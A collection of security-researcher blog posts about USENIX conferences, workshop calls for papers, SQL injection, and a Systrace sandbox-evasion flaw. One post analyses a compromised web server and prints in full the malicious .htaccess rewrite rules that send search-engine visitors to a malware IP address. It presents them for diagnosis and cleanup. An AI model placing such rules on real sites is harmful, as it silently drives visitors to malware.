Niels Provos (Entries tagged as usenix)

Looking forward to USENIX Security!

nospam@example.com (Niels Provos) — Thu, 07 Jul 2011 17:36:40 -0700

USENIX Security is by far my favorite conference. This year is taking place in San Francisco from August 8th to August 11th and the program looks pretty strong again. There is some great work on quickly detecting malicious Javascript in the Browser and the talk on "Comprehensive Experimental Analyses of Automotive Attack Surfaces" promises to make us all rethink the security of our cars. Actually, all of the sessions seem like they will be interesting. So, see you all there.

LEET'09: Large Scale Exploits and Emergent Threats

nospam@example.com (Niels Provos) — Tue, 14 Apr 2009 17:25:08 -0700

The 2nd USENIX LEET workshop is going to take place on April 21st in Boston next week. The workshop program looks really interesting. There are a number of really interesting talks; here are just a few:

Spamcraft: An Inside Look At Spam Campaign Orchestration
A Foray into Conficker's Logic and Rendezvous Points
A View on Current Malware Behaviors

Last year's workshop was a blast and I expect that next week is going to be lots of fun, too. It is still possible to register on-site for the workshop.

WOOT'09 Call For Papers

nospam@example.com (Niels Provos) — Thu, 26 Mar 2009 23:36:13 -0700

WOOT is the Workshop on Offensive Technologies. This year, it's being held for the third time and the call for papers just came out. Submissions are solicited for a variety of interesting topics including:

Vulnerability research (software auditing, reverse engineering)
Exploit techniques and automation
Malware design and implementation (rootkits, viruses, bots, worms)

The last two years were a lot of fun and this years organizers are an eclectic bunch of well known folks. If you have anything in the works, go submit it and we will see you at the workshop.

Using htaccess To Distribute Malware

nospam@example.com (Niels Provos) — Fri, 05 Dec 2008 20:34:36 -0800

Usually, I get to find compromised web servers, but last week I was asked to fix one. A relative noticed that his web server would try to install a rogue anti-malware product and called me for help. Curiously, the malware showed up only when clicking on the search results for his web site, but the site was fine when typing the address directly into the location bar. A little investigation with curl could reproduce that behavior:

curl -I -H "Referer: www.google.com" http://www.foo.com/

returned a 302 redirect to an IP address, whereas

curl -I http://www.foo.com/

returned a 200. To find where the code might have been injected, I grepped the whole web server for the IP address and found the following gem in .htaccess:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L]

This code instructs the web server to redirect visitors to a malware site if they come from popular search engines.

The attackers were able to insert this file as the web application had a remote file inclusion vulnerability. These attacks are quite popular as we found in our paper: To Catch a Predator: A Natural Language Approach for Eliciting Malicious Payloads. The fix in this case was to remove the .htaccess file and to upgrade the web application to a patched version without the vulnerability.

SQL Injection Redux

nospam@example.com (Niels Provos) — Tue, 25 Nov 2008 20:59:35 -0800

During my invited talk on web-based malware at USENIX Security, I mentioned SQL Injection as one of the more popular means of compromising web servers. Although I did not have a chance to post my slides, here is one graph that shows how many URLs with drive-by downloads due to SQL injection were found by Google's infrastructure in July 2008; it's over 800,000 URLs. Curiously, most of these were due to the Asprox botnet.

The situation has slightly changed since then, Asprox has become quiet and most of the SQL Injection attacks seem to originate from Chinese sites. One way to determine if a site has been injected with malicious content is the Safe Browsing diagnostic page which shows infection domains and also how many sites they compromised. Here is an example of a Chinese SQL injection domain, ko118.cn.

To help web application developers, OWASP has published detailed guidelines on preventing SQL injection attacks. More importantly if your web site was SQL injected, its database needs to be cleaned to remove the injected content.

LEET '09 Call for Papers

nospam@example.com (Niels Provos) — Wed, 12 Nov 2008 18:48:12 -0800

The CfP for the 2nd USENIX Workshop on Large-Scale Exploits and Emergent Threats (LEET '09): Botnets, Spyware, Worms, and More is up at:

http://www.usenix.org/event/leet09/cfp/.

LEET '09 will be held on April 21, 2009 in Boston, MA immediately before the 6th USENIX Symposium on Networked Systems Design and Implementation (NSDI '09), which will take place April 22–24, 2009.

Important Dates

Submissions due: January 16, 2009, 11:59 p.m. EST
Notification of acceptance: March 2, 2009
Electronic files due: March 30, 2009

This will be the second edition of LEET, which had evolved from the combination of two other successful workshops, the ACM Workshop on Recurring Malcode (WORM) and the USENIX Workshop on Hot Topics in Understanding Botnets (HotBots). These two workshops have each dealt with aspects of this problem. However, while papers relating to both worms and botnets are explicitly solicited, LEET has a broader charter than its predecessors. We encourage submissions of papers that focus on any aspect of the underlying mechanisms used to compromise and control hosts, the large-scale "applications" being perpetrated upon this framework, or the social and economic networks driving these threats.

Getting ready for USENIX Security

nospam@example.com (Niels Provos) — Mon, 28 Jul 2008 17:51:44 -0700

This week is going to be crazy busy with HotSec and USENIX Security in San Jose. I am chairing the HotSec workshop tomorrow. We were able to get a pretty nice program this year. At USENIX Security, I am going to give two talks. One is in the technical program talking about "All Your iFrames Point to Us" and the other one is an invited talk on web-based malware on Friday. I am still working on the slides.

HotSec is Hot!

nospam@example.com (Niels Provos) — Thu, 10 Jul 2008 17:05:43 -0700

This year, I have the pleasure of chairing the 3rd USENIX Workshop on Hot Topics in Security, an invitation-only workshop that provides a forum for leading security researchers to discuss current trends and new research ideas. At the program committee meeting in Mountain View, we selected 13 out of 37 papers for the final program. It's pretty hot. Here are some of the talks I am looking forward to:

Towards Application Security on Untrusted Operating Systems
Defeating Deniable File Systems: A TrueCrypt Case Study
Panic Passwords: Authenticating under Duress
Absence Makes the Heart Grow Fonder: New Directions for Implantable Medical Device Security

HotSec is taking place on July 29th, one day before the technical program of the USENIX Security Symposium. The keynote for USENIX Security is going to be exciting: Debra Bowen, the California Secretary of State, is speaking on Dr. Strangevote or: How I Learned to Stop Worrying and Love the Paper Ballot.

See you there,
Niels.

Evading System Sandbox Containment

nospam@example.com (Niels Provos) — Thu, 09 Aug 2007 14:51:52 -0700

At WOOT this year, Robert Watson presented a paper on how to evade popular system call interposition systems, including Systrace. For Systrace, Robert noticed that the arguments written to the stackgap could be replaced by a co-operating process after Systrace performed its policy check. The initial prototype of Systrace as described in the paper avoided this problem by using a look-aside buffer in the kernel. This imposes a slight performance penalty but I hope that this obvious solution is going to be included in the OpenBSD and NetBSD kernel soon.